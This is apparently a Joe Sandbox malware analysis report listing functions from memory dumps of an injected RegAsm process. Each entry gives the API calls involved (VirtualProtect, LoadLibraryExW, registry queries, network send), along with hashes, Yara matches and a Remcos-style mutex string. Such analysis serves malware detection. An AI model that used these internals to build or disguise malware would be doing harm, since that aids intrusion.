                                                                                                                                    • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                                    • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HandleModuleProtectVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2905821283-0
                                                                                                                                  • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                  • Instruction ID: 210348daefc771ff09e919cc38fdfa0d839c8297c2798a32150270056baeab90
                                                                                                                                  • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                  • Instruction Fuzzy Hash: 0301D22094574A38BA51D7B40C06EBA5FD8DB176E0B24D756F1408619BDDA08906C3AE
                                                                                                                                  Function 004485E6 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue), ref: 00448618
                                                                                                                                  • GetLastError.KERNEL32(?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367), ref: 00448624
                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000), ref: 00448632
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3177248105-0
                                                                                                                                  • Opcode ID: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                                                                                                  • Instruction ID: 239c22332ac31c5199b3ba4764290be2907fca328f5d1df1ca03bb1201a614b6
                                                                                                                                  • Opcode Fuzzy Hash: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                                                                                                  • Instruction Fuzzy Hash: D401FC32602322EBDB618A78EC4495F7758AF15BA2B22093AF909D3241DF24DC01C6EC
                                                                                                                                  Function 10005CE1 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
                                                                                                                                  • GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3177248105-0
                                                                                                                                  • Opcode ID: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                                                                                  • Instruction ID: ab8c2af688280ff547417c348c7c3430721907d0b6a0cc88e9d35c15e8af339b
                                                                                                                                  • Opcode Fuzzy Hash: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                                                                                  • Instruction Fuzzy Hash: 59018436615732ABE7319B689C8CB4B7798EF056E2B214623F909D7158D731D801CAE0
                                                                                                                                  Function 0041C516 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0041C543
                                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C568
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041C576
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$CloseCreateHandleReadSize
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3919263394-0
                                                                                                                                  • Opcode ID: eaf6ed3f63b4403b43378431095bcec12dbe7b76bb0b9555606dcebd0a0bb3a0
                                                                                                                                  • Instruction ID: 4673af35f3eeaf13de89ae80f5e83caf65f56e40ae5cb47f4621101913e6d1ef
                                                                                                                                  • Opcode Fuzzy Hash: eaf6ed3f63b4403b43378431095bcec12dbe7b76bb0b9555606dcebd0a0bb3a0
                                                                                                                                  • Instruction Fuzzy Hash: 50F0C2B1241318BFE6101B25ADC9EBB369DDB866A9F10063EF802A22D1DA698D055139
                                                                                                                                  Function 10006E20 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 168COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
                                                                                                                                  • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,10006CC1,?,00000000), ref: 10006E94
                                                                                                                                  • GetCPInfo.KERNEL32(00000000,10006CC1,?,?,?,10006CC1,?,00000000), ref: 10006EA7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CodeInfoPageValid
                                                                                                                                  • String ID: fYM/
                                                                                                                                  • API String ID: 546120528-2459865102
                                                                                                                                  • Opcode ID: 4adf61bb8ef5ba689b58ef35b1aaecca0a92cbb4d0ae1edbfb61d6a665a170f3
                                                                                                                                  • Instruction ID: 1dd91d3823b6bb4934ca9945ee4913e93bf289da146d72ec34fd0236562290e4
                                                                                                                                  • Opcode Fuzzy Hash: 4adf61bb8ef5ba689b58ef35b1aaecca0a92cbb4d0ae1edbfb61d6a665a170f3
                                                                                                                                  • Instruction Fuzzy Hash: 91513474E043469EFB21CF71DC916BBBBE6EF49280F20807EE48687156D735DA458B90
                                                                                                                                  Function 10006ACB Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 10006AF0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Info
                                                                                                                                  • String ID: $fYM/
                                                                                                                                  • API String ID: 1807457897-372684241
                                                                                                                                  • Opcode ID: 6cedc9456a51a48c8b79c853d380540c5183232597a17884e183f7c8afc1900e
                                                                                                                                  • Instruction ID: 7792c4a5177154c3e9ca344f7bd1be717728489360a1cc3eced530dab922c6d1
                                                                                                                                  • Opcode Fuzzy Hash: 6cedc9456a51a48c8b79c853d380540c5183232597a17884e183f7c8afc1900e
                                                                                                                                  • Instruction Fuzzy Hash: D241FCB050429C9AFB21CF148C84BEABBEAEB49344F2444EDE5C9C6146D735AA85DF20
                                                                                                                                  Function 00418ACD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418AF9
                                                                                                                                    • Part of subcall function 00418691: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
                                                                                                                                  • SHCreateMemStream.SHLWAPI(00000000), ref: 00418B46
                                                                                                                                    • Part of subcall function 00418706: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
                                                                                                                                    • Part of subcall function 004186B4: GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                                                                                  • String ID: image/jpeg
                                                                                                                                  • API String ID: 1291196975-3785015651
                                                                                                                                  • Opcode ID: 4c0baae4c0e9e9d16754b7ecd539cceb7e47a4de3878ce98d6afbfe1b810872b
                                                                                                                                  • Instruction ID: 4d0b5c8bb5c89928ccad9adfa1773eea8e0f3015d74a4b244142dc53e7d0f70c
                                                                                                                                  • Opcode Fuzzy Hash: 4c0baae4c0e9e9d16754b7ecd539cceb7e47a4de3878ce98d6afbfe1b810872b
                                                                                                                                  • Instruction Fuzzy Hash: B5316D71604300AFC301EF65C884DAFBBE9EF8A304F00496EF985A7251DB7999048BA6
                                                                                                                                  Function 10005F19 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,5EFC4D8B,00000100,?,5EFC4D8B,00000000), ref: 10005F8A
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: String
                                                                                                                                  • String ID: LCMapStringEx$fYM/
                                                                                                                                  • API String ID: 2568140703-416117473
                                                                                                                                  • Opcode ID: 9311d150e09a2ea236c127db5a9a9399c35e1f3cdcd5bb094b510bbe54d2b48d
                                                                                                                                  • Instruction ID: 984c2aabb43d86beb2eff1d34daabde68608d0bd8f0a2971fe4c3ea005c0c61c
                                                                                                                                  • Opcode Fuzzy Hash: 9311d150e09a2ea236c127db5a9a9399c35e1f3cdcd5bb094b510bbe54d2b48d
                                                                                                                                  • Instruction Fuzzy Hash: 9401D332500159BBEF129F90CC05EEE7F66EF08390F018115FE1826124CB369971AB95
                                                                                                                                  Function 10005D5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Alloc
                                                                                                                                  • String ID: FlsAlloc$fYM/
                                                                                                                                  • API String ID: 2773662609-550503114
                                                                                                                                  • Opcode ID: 5ade6ed448300679f83b5d20ac83fd3ad7347746afaf7e54a560ff76d56e46a0
                                                                                                                                  • Instruction ID: c304bc83fd0672a576945d725d7c66755e55876121cef6cfa1c70df20931aaa1
                                                                                                                                  • Opcode Fuzzy Hash: 5ade6ed448300679f83b5d20ac83fd3ad7347746afaf7e54a560ff76d56e46a0
                                                                                                                                  • Instruction Fuzzy Hash: 43E0E535600228ABF325EB608C15EEFBBA4DB583D1B01405AFE0966209CE326D0185D6
                                                                                                                                  Function 0040D0A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC43,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0040D0B3
                                                                                                                                  • GetLastError.KERNEL32 ref: 0040D0BE
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateErrorLastMutex
                                                                                                                                  • String ID: Rmc-IAW1Y3
                                                                                                                                  • API String ID: 1925916568-3914838558
                                                                                                                                  • Opcode ID: 28fa13b7b1caae5192b70daf2f30c6e0a610ddba166525727d25863cd50ab091
                                                                                                                                  • Instruction ID: 57749e379dff282fb0cfe370275dd79dddcb706c5168e3a31171962593876721
                                                                                                                                  • Opcode Fuzzy Hash: 28fa13b7b1caae5192b70daf2f30c6e0a610ddba166525727d25863cd50ab091
                                                                                                                                  • Instruction Fuzzy Hash: 0DD012B0605700EBDB186770ED5975839559744702F40487AB50FD99F1CBBC88908519
                                                                                                                                  Function 1000C7A7 Relevance: 4.6, APIs: 3, Instructions: 100COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                                    • Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                                                                    • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                                    • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HandleModuleProtectVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2905821283-0
                                                                                                                                  • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                  • Instruction ID: abaa11d5974e3e1b05dfd32ec0224f7ddc3d76465740e120717e363e7a178845
                                                                                                                                  • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                  • Instruction Fuzzy Hash: A921382140838A6FF711CBB44C05FA67FD8DB172E0F198696E040CB147DDA89845C3AE
                                                                                                                                  Function 00404AA1 Relevance: 4.6, APIs: 3, Instructions: 93synchronizationnetworkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                                                                                  • SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: EventObjectSingleWaitsend
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3963590051-0
                                                                                                                                  • Opcode ID: b1d66744df5c6cb587348be29f4f2b73cfa97db57556f8ad38e66ecf600c3840
                                                                                                                                  • Instruction ID: ade4869c8039bafc3f5202e75afdfb18787be874a76dce876c460fae4797ad88
                                                                                                                                  • Opcode Fuzzy Hash: b1d66744df5c6cb587348be29f4f2b73cfa97db57556f8ad38e66ecf600c3840
                                                                                                                                  • Instruction Fuzzy Hash: 152124B2900119BBCB04ABA1DC95DEEB77CFF14314B00452FF515B71E2EB38AA15C6A4
                                                                                                                                  Function 1000C803 Relevance: 4.6, APIs: 3, Instructions: 54memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                                  • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                                  • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ProtectVirtual$HandleModule
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3519776433-0
                                                                                                                                  • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                  • Instruction ID: 9138b94afbcae90e12a8614b592989542e7cb6e8cba5f1d72008c399686a5f74
                                                                                                                                  • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                  • Instruction Fuzzy Hash: B7F0C2619497893CFA21C7B40C45EBA5FCCCB276E0B249A56F600C718BDCA5890693FE
                                                                                                                                  Function 004135E1 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                                                                                  • RegQueryValueExA.KERNEL32 ref: 00413622
                                                                                                                                  • RegCloseKey.KERNEL32(?), ref: 0041362D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3677997916-0
                                                                                                                                  • Opcode ID: 6d7bb055a41a46af3afbf88891c67b332a8db22587d044117d184b09d82707ea
                                                                                                                                  • Instruction ID: 0661f39b514c0023b6096d8878825bbc81d19e8e8981dfb5b132c5fecbfe39b6
                                                                                                                                  • Opcode Fuzzy Hash: 6d7bb055a41a46af3afbf88891c67b332a8db22587d044117d184b09d82707ea
                                                                                                                                  • Instruction Fuzzy Hash: 4A01D676900228FBCB209B91DC08DEF7F7DDB44B51F004066BB05A2240DA748E45DBA4
                                                                                                                                  Function 00413733 Relevance: 4.5, APIs: 3, Instructions: 42registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 0041374F
                                                                                                                                  • RegQueryValueExA.KERNEL32 ref: 00413768
                                                                                                                                  • RegCloseKey.KERNEL32(00000000), ref: 00413773
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3677997916-0
                                                                                                                                  • Opcode ID: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                                                                                                                  • Instruction ID: cdc8bb2f12cdea1da97e3e4d454c68039a4c25ad8704162e95ac064a0ac82555
                                                                                                                                  • Opcode Fuzzy Hash: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                                                                                                                  • Instruction Fuzzy Hash: C301AD7540022DFBDF215F91DC04DEB3F38EF05761F008065BE09620A1E7358AA5EB94
                                                                                                                                  Function 00413584 Relevance: 4.5, APIs: 3, Instructions: 37registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                                                                                                                  • RegQueryValueExA.KERNEL32 ref: 004135C2
                                                                                                                                  • RegCloseKey.KERNEL32(?), ref: 004135CD
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3677997916-0
                                                                                                                                  • Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                                                                                                  • Instruction ID: 3ea041f737baa467864e73cd7e114674dd940ed34319bd14b5ec79364d8ab256
                                                                                                                                  • Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                                                                                                  • Instruction Fuzzy Hash: 39F01D76900218FFDF109FA09C45FEE7BBDEB04B11F1044A5BA04E6191D6359F549B94
                                                                                                                                  Function 0041353A Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413551
                                                                                                                                  • RegQueryValueExA.KERNEL32 ref: 00413565
                                                                                                                                  • RegCloseKey.KERNEL32(?), ref: 00413570
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3677997916-0
                                                                                                                                  • Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                                                                                                  • Instruction ID: 960a54a16a1ccd4152458ec6927d20d37e2092670a33f2d7c306b576a706ad25
                                                                                                                                  • Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                                                                                                  • Instruction Fuzzy Hash: 23E06532801238FBDF204FA29C0DDEB7F6CDF06BA1B000155BD0CA1111D2258E50E6E4
